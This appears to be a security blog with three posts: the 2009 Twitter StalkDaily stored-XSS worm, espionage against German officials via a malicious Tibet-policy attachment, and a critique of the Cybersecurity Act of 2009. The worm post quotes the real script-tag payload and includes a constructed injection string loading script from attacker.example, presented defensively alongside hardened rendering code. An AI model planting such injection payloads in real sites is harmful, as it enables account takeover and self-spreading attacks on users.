Twitter Worm

DCortesi has posted a nice summary of a cross-site scripting worm on Twitter:

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter did not validate or HTML-encode the profile URL field, so markup stored there, script tags included, was rendered straight into the page. The malicious JavaScript ran in the browser of anyone who viewed a compromised profile and altered the viewer's own profile, so anyone who then looked at that page was infected as well, and so forth: a self-propagating stored XSS worm. The fix belongs on the server side, by rejecting anything in that field that is not a plain http(s) URL and encoding it on output.

An excellent way to protect yourself on the client side is with NoScript or a similar browser utility that requires you to whitelist JavaScript, as DCortesi mentions. You would be prompted to allow a script from uuuq.com, at which point you hopefully would say no and realize the Twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.
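To make the two halves of this concrete, here is an added example (not Twitter's code and not from DCortesi's write-up) of a profile page that drops the stored URL field straight into its HTML, beside a hardened renderer that allow-lists the URL scheme and HTML-encodes the value on output. The render functions, the attacker host and the sample inputs are hypothetical and constructed for the example.

```javascript
// Added example: vulnerable vs. hardened rendering of a stored profile URL.
// Not Twitter's code; the render functions and attacker host are hypothetical.

// Constructed attacker input, shaped like the payload quoted above: the quote
// closes the href attribute and everything after it is parsed as markup.
const ATTACK_URL =
  'http://www.stalkdaily.com"><script src="http://attacker.example/x.js"></script><a href="';

// Vulnerable: untrusted text concatenated into an attribute and into the link
// body. Any " or < in the value changes the structure of the page.
function renderProfileLinkVulnerable(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Escape the five characters that matter in text and quoted-attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow-list the scheme. Encoding alone is not enough for an href: a value like
// javascript:alert(1) contains nothing to escape but still runs on click.
function isAllowedProfileUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    // Unparseable. The payload above fails here: space, < and > are not
    // permitted in a host name, so the URL parser rejects it outright.
    return false;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// Hardened: validate, then encode. Rejected values are shown as inert text
// rather than silently dropped, so the owner can see what was stored.
function renderProfileLinkHardened(url) {
  if (!isAllowedProfileUrl(url)) {
    return '<span>' + escapeHtml(url) + '</span>';
  }
  const safe = escapeHtml(url);
  return '<a href="' + safe + '" rel="nofollow">' + safe + '</a>';
}

// Crude check used to compare the two renderers: does the output contain a
// script element or a javascript: link?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /href="javascript:/i.test(html);
}

// Walk a list of stored values through both renderers and report which
// versions of the page end up carrying active content.
function compareRenderers(values) {
  return values.map((v) => ({
    value: v,
    vulnerable: containsActiveContent(renderProfileLinkVulnerable(v)),
    hardened: containsActiveContent(renderProfileLinkHardened(v)),
  }));
}

console.log(compareRenderers([ATTACK_URL, 'javascript:alert(1)', 'https://example.com/']));
```

The point of keeping both checks is that they close different holes: encoding stops the quote-and-script-tag injection from the worm, while the scheme allow-list stops a javascript: href that encoding would pass through untouched.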

Modern Espionage

Spiegel Online provides some details on espionage detected in Germany, including the ‘Ghostnet’

German intelligence also detected a noticeable increase in cyber attacks before meetings between Merkel and the Dalai Lama. The hackers appear to be particularly interested in the Tibet issue. In January 2008, various German officials received an e-mail with an attached document titled: “Analysis of Chinese Government Policy Toward Tibet.” The sender was supposedly a Tibetan organization in the United States. A malicious program was hidden in the analysis.

The giant question, of course, is whether anyone can trace anything conclusively. Since plausible deniability is so effective in the physical world, I suspect technology will produce the same results, only faster. Sloppy work by the spies will lead to convictions, but otherwise there will be a tangled web of dead ends to sift through, creating demand for better correlation and monitoring tools.

Cybersecurity Act of 2009

The US Congress is reviewing proposed legislation that gives the President the ability to disconnect any federal government or critical infrastructure cyber (for lack of a better word) system. The Cybersecurity Act, also known as Rockefeller/Snowe, begins ominously:

The Congress finds the following: (1) America’s failure to protect cyberspace is one of the most urgent national security problems facing the country.

It then provides quotes from a number of sources that say technology underpins the economy and is significantly weaker than more conventional infrastructure. Here is number ten, for example:

(10) According to the National Journal, Mike McConnell, the former Director of National Intelligence, told President Bush in May 2007 that if the 9/11 attackers had chosen computers instead of airplanes as their weapons and had waged a massive assault on a U.S. bank, the economic consequences would have been “an order of magnitude greater” than those caused by the physical attack on the World Trade Center. Mike McConnell has subsequently referred to cybersecurity as the “soft underbelly of this country.”

Scary. But help is on the way. A Cybersecurity Advisory Panel is to be created that will represent everyone and advise the President. Paller must be crushed that this does not just say SANS will be given the task…

One of the more interesting tasks is a monitoring dashboard assigned to the Secretary of Commerce.

…implement a system to provide dynamic, comprehensive, real-time cybersecurity status and vulnerability information of all Federal government information systems and networks managed by the Department of Commerce

In a similar vein, the Director of NIST is expected to build a dashboard to measure and illustrate the economics of cyber security.

These metrics should measure risk reduction and the cost of defense. The research shall include the development of automated tools to assess vulnerability and compliance.

I get where they were trying to go with all this, but it is really rough around the edges. The enforcement section is practically empty, and ideas like a vulnerability specification language that will “communicate vulnerability data to software users in real time” seem strangely out of place. Do we really need a vulnerability language in a federal act? Who wants a secure domain name addressing system run out of a federal mandate?

It is hard not to notice that there is also a provision for mandatory licensing of cybersecurity professionals. I think it is great that information security is getting a big focus in the stimulus and infrastructure projects, but I find it hard to believe anyone will really support so much power being placed under the executive branch.